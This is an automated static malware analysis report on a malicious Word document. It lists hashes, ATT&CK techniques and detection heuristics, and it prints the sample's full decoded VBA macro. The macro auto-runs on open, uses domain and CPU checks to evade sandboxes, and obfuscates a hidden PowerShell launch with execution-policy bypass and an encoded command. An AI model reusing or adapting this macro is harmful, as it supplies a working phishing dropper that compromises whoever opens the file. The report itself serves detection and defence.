Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4e598cf56846441…

MALICIOUS

Office (OLE)

111.5 KB Created: 2017-11-15 14:02:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: 3001edc918da564e7d80ec3075275664 SHA-1: 2558dcfccc6ff9071c6611989b3eebbb8e600e28 SHA-256: a4e598cf568464418e1cbbac885ff3f3e3019cbfeb2cfd1602238d817ee131f5
158 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a VBA macro that is automatically executed upon opening, as indicated by the 'Document_Open' subroutine and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. This macro utilizes the ShellExecute API to run external commands, a common technique for downloading and executing further malicious payloads. The presence of 'CreateObject' and 'Environ' calls suggests potential interaction with the system environment to facilitate this execution.

Heuristics 7

  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject"
    If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False
End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    If DNameCheck And NumOfCores Then
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Private Function DNameCheck() As Boolean
    DName = Environ("USERDNSDOMAIN")
    If DName = "" Then DNameCheck = False Else DNameCheck = True
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ocsp.digicert.com0C In document text (OLE body)
    • http://ocsp.digicert.com0NIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDPIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0��In document text (OLE body)
    • http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:�8�6�4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0OIn document text (OLE body)
    • https://www.digicert.com/CPS0In document text (OLE body)
    • http://crl3.digicert.com/sha2-assured-cs-g1.crl05�3�1�/http://crl4.digicert.com/sha2-assured-cs-g1.crl0LIn document text (OLE body)
    • http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3515 bytes
SHA-256: dacf3f37e9babd518a4860d3f15d194a1d768234920ccbfb9188e436a038fb98
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
    Private Declare PtrSafe Function EoC Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, _
        ByVal lpFile As String, _
        ByVal lpParameters As String, _
        ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
#Else
    Private Declare Function EoC Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, _
        ByVal lpFile As String, _
        ByVal lpParameters As String, _
        ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
#End If

Public in1Line As String
Public strfldr As String
Public strVVV As String
Public strExt As String
Public DName As String

Private Sub Document_Open()
    If DNameCheck And NumOfCores Then
        in1Line = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text: _
        Enc_Change: _
        RptFldrStat: _
        Memorandum
    End If
End Sub

Private Function Enc_Change()
    Dim strAlpha As String
    Dim strPoWP
    
    strAlpha = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    strPoWP = "SysWOW64" & Chr(92) & Left(Mid(strAlpha, 23), 1) & "indo" & Left(Mid(strAlpha, 23), 1) & "s" & Chr(92) & Left(Mid(strAlpha, 29), 1) & ":"

    strVVV = Left(Mid(strAlpha, 16), 1) & Left(Mid(strAlpha, 15), 1) & Left(Mid(strAlpha, 23), 1) & Left(Mid(strAlpha, 5), 1) & _
    Left(Mid(strAlpha, 18), 1) & Left(Mid(strAlpha, 19), 1) & Left(Mid(strAlpha, 8), 1) & Left(Mid(strAlpha, 5), 1) & Left(Mid(strAlpha, 12), 1) & Left(Mid(strAlpha, 12), 1)
    strExt = "." + Chr(CStr(Asc(Mid$(strAlpha, 5, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 24, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 5, 1))))
    strPoWP = Split(strPoWP, "\"): strfldr = strPoWP(2) & Chr(92) & strPoWP(1) & Chr(92) & strPoWP(0)
End Function

Private Function RptFldrStat() As Boolean
    Dim fsObj As String
    fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject"
    If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False
End Function

Private Function Memorandum() As Variant
    Dim strProgramName As String
    Dim strArgument As String
    If RptFldrStat = True Then strProgramName = strfldr & "\Windows" & strVVV & "\v1.0\" & strVVV & strExt Else strProgramName = strVVV & strExt
    strArgument = " -" & Chr(101) & Chr(112) & " " & Chr(98) & Chr(121) & Chr(112) & Chr(97) & Chr(115) & Chr(115) & " -" & Chr(110) & Chr(111) & Chr(112) & " -" & Chr(110) & Chr(111) & Chr(101) & Chr(120) & Chr(105) & Chr(116) & " -" & "enc " & """" & in1Line & """"
    EoC 0&, vbNullString, strProgramName, strArgument, "", 0
End Function

Private Function DNameCheck() As Boolean
    DName = Environ("USERDNSDOMAIN")
    If DName = "" Then DNameCheck = False Else DNameCheck = True
End Function

Function NumOfCores() As Boolean
    Dim strRegKey As String
    On Error Resume Next
    strRegKey = CreateObject("W" + "S" + "cript" + Chr(46) + "Sh" + Chr(101) + "ll").RegRead("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString")

    If Err Then NumOfCores = False Else NumOfCores = True
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.